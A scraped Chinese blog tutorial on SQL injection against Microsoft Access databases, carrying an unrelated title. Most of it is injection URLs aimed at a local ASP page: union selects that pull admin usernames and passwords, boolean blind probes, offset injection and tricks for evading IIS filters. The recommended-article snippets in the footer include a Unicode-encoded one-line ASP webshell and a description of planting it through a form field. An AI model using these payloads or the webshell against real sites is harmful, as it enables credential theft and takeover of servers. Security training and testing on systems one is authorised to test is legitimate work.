access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle

最新推荐文章于 2022-07-08 12:03:44 发布
最新推荐文章于 2022-07-08 12:03:44 发布
阅读量365 收藏
点赞数
文章标签: access筛选末位数字为1或5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39957835/article/details/111685317
版权

f38f5e9cb44fa12649ce4d476e99d231.png

一、Access注入

Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。

Access只有联合注入和布尔盲注。

1,联合注入

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 22
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin

2,布尔盲注

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97

3,如何查询第二行的值

id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where id=40
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where admin not in ('admin')
id=1513 union select 1,2,(select top 1 password from (select top 2 * from admin order by 1 desc)),4,5,6,7,8,9,10,11,12,13,14, (select top 1 admin from (select top 2 * from admin order by 1 desc)),16,17,18,19,20,21,22 from admin

4,access猜列名的一些特殊解法

利用having爆列

select id,admin,password from admin where id=1 group by 1 having 1=1
select id,admin,password from admin where id=1,id group by 1 having 1=1
select id,admin,password from admin where id=1 group by 1,id having 1=1
select id,admin,password from admin where id=1 group by 1,id,admin having 1=1
select * from admin where id=1 having sum(1)=1

偏移注入,需要猜到一个列名,一般是id

id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)

移位溢注

id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,admin.*,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin

联合使用,必须总列数超过admin列数的1/4,上述条件不满足

select 1,2,3,4,5,6,a.*,* from (admin as a inner join admin as b on a.id=b.id)

5,一些tips

access空白符,%20,%09,%0A,%0C,%0D

没有注释,但是有注释符号,%16,%00

select(password)from(admin)
select[password]from[admin]
select`password`from`admin`

IIS特殊之处

允许出现%,比如uni%on select

允许Unicode编码,比如%u0075%u006eion select

这里和和json格式类似,{"id":"u0031"

最低0.47元/天 解锁文章
weixin_39957835
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-安全杂项-BAT公司信息查询系统
mynd天堂
03-06 1931
题目来源-http://www.shiyanbar.com/ctf/1820点击打开链接 打开题目链接,首先让我感到背景很奇怪,是一大堆同一张二维码,点击源码,查看里面的样式看到一张lala.jpg是一张二维码扫描得到rootpadding.txt,进入得: 这就是我们第一次点击页面时对ID的判断,代码已经说明了跳向何处,直接进入得是一个404页面查看源码有一句很 奇怪的
unicode转ansi
05-26
当看到“┼攠數畣整爠煥敵瑳∨灯捸≤┩>”这样的内容时,可以用该软件转换为“”,比csdn之前上传的更好用。
SQL通用防注入系统asp版 插一句话漏洞利用
weixin_30314813的博客
08-06 240
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp 既然做了记录,再查看了下它的记录文件 于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的. ┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode) 提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 ht...
史上最全一句话木马
hackzkaq的博客
06-29 7783
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
各种cms getshell技巧
qq_53742230的博客
07-08 2699
常用CMS getshell技巧
ASP_ACCESS_SQL_Injection_Test.rar_asp access注入_linux_sql注入_注入_注入
09-19
ASP_ACCESS_SQL_Injection_Test 是一个针对ASP访问Access数据库时可能出现SQL注入漏洞的测试工具。SQL注入是一种常见的网络安全问题,攻击者通过在输入字段中插入恶意SQL代码,试图获取未经授权的数据或者控制数据库...
Greate_SQL_Example.rar_GreateSQL_Oracle in english_access SQL_sq
最新发布
09-24
目前,绝大多数流 行的关系型数据库管理系统,如Oracle, Sybase, Microsoft SQL Server, Access等都采用了SQL语言标准。虽然很多数据库都对SQL语句进行了再开发和扩展,但是包括Select, Insert, Update, Delete, ...
数据库操作-ADO篇.rar_ADO_ADO ACCESS_ADO oracle_ado sql_数据库操作
09-14
标签中的“ado ado__access ado__oracle ado__sql 数据库操作”进一步强调了主题,这些标签说明了ADO将被用于连接和操作AccessOracleSQL Server数据库,同时也再次重申了这是关于数据库操作的内容。 在压缩包子...
w3school_sql.rar_AccessSQL_DB2教程_oracle
09-22
无论是在Oracle、Sybase、SQL Server、DB2还是Access这些数据库管理系统中,SQL都扮演着核心角色,用于创建、查询、更新和管理数据库。 **Access**是Microsoft公司开发的一个关系型数据库管理系统,它以图形用户...
ASP_ACCESS_SQL_Injection_Test.rar_sql注入_tool
09-20
ASP_ACCESS_SQL_Injection_Test 是一个专门针对ASP(Active Server Pages)和ACCESS数据库的SQL注入测试工具。这个压缩包包含了两个文本文件和一个可执行程序,用于帮助开发者或安全研究人员检测和预防SQL注入漏洞。...
UNICODE码和ANSI码两种编码转换工具
05-26
UNICODE2ANSI.exe是UNICODE码和ANSI码两种编码转换工具。说编码转化可能很多朋友还不是很明白,但是如果说起插入数据库的一句话“”的加密代码“┼攠數畣整爠煥敵瑳∨≮┩>”,相信很多朋友都有所耳闻。它就是一个转换这2种编码的一个小工具。
CTF-安全杂项(十一)
→_→
09-03 1256
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 21.BAT公司信息查询系统(来源:实验吧) 1.关卡描述 2.解题步骤 分析: 进去网址后,看到的是满屏二维码: 直接扫码可以得到: 也可以直接右键--源代码: r...
墨者学院-CMS系统漏洞分析溯源(第3题)
JimWu的博客
09-04 500
CMS系统漏洞分析溯源(第3题) 难易程度:★★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、菜刀 1.打开靶场,跟住题目的解题思路提示在用户注册的密码问题能将一句话木马插入到数据库当中。 然后把前面的信息填好。 在密码问题中填入:┼攠數畣整爠煥敵瑳∨≡┩愾 这是由<% execute request(“a”)%>经过Unicode加密的,加密方式是: ANSI→Unico...
一次贴近实战的CTF比赛(cookie欺骗、php函数、Tomcat漏洞、注入、逆向等)
渗透、攻防、CTF、编程
06-29 8533
19题170分 一、web安全-29 1.cookie欺骗(web登录)9 http://***.***.***.50:8040/admin/login.asp 解题思路: http://***.***.***.50:8151/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,passw...
WINHEX
LANVNAL的博客
01-20 3545
可以查看16进制文件 比如做题遇到这个: ┼攠數畣整爠煥敵瑳∨灯捲≤┩> –> 把上面这串复制到记事本,另存为,编码选上“Unicode”,关闭。用WinHex等可以查看16进制的软件,直接打开,一目了然。如果想显示正常,把开头的FF FE两个字节删了,再用记事本打开就看到了。 原理是:Windows平台下默认的Unicode编码为Little Endian的UTF-16,UTF-16就需
CTF-web 第十部分 webshell基础与免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
access筛选末位数字为1或5_Access怎么设置主动编号从1末尾排序
weixin_34832809的博客
01-26 1426
Access怎么设置主动编号从1末尾排序发表于2019-04-14 07:31|次阅读|来源网络整理|作者session摘要:Access怎么设置主动编号从1末尾排序Access怎么设置主动编号从1末尾排序方法一:删个那个主动编号的字段,再建一个异样的主动编号字段即可。方法二:主动编号是不断添加的(每次都加1),你再添加一条记载它的编号会在后面的根底上加1(删除的也算),假设你编号为1的记载被删除...
access筛选末位数字为1或5_如何筛选跟踪沪深300指数的基金
weixin_39668496的博客
12-15 111
如何筛选一个指数基金呢?这是一个问题,之所以想这么个标题一是这是基金投资者都应该要做的。二是曾经这道题我不会,现在自己在尝试解这道题。我依稀记得,当时看到这种筛选基金标题时那种略感头晕,似懂非懂的感觉,所以我觉得读者如果没有自己筛选过,现在肯定是这种感觉。咱们来分析个题目,筛选二字,1、首先要找到跟踪沪深300指数的基金池。2、然后构建一个筛子,筛子就是标准、规则。基金池我用到的是cho...
数据库转换教程:从ACCESSSQLServer到ORACLE
"本文档详述了如何将ACCESSSQLServer数据库转换为ORACLE数据库的步骤,使用Navicat for Oracle作为工具进行操作,过程包括AccessOracleSQLServer到Oracle的数据迁移。" 在IT领域,数据库之间的转换和迁移是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值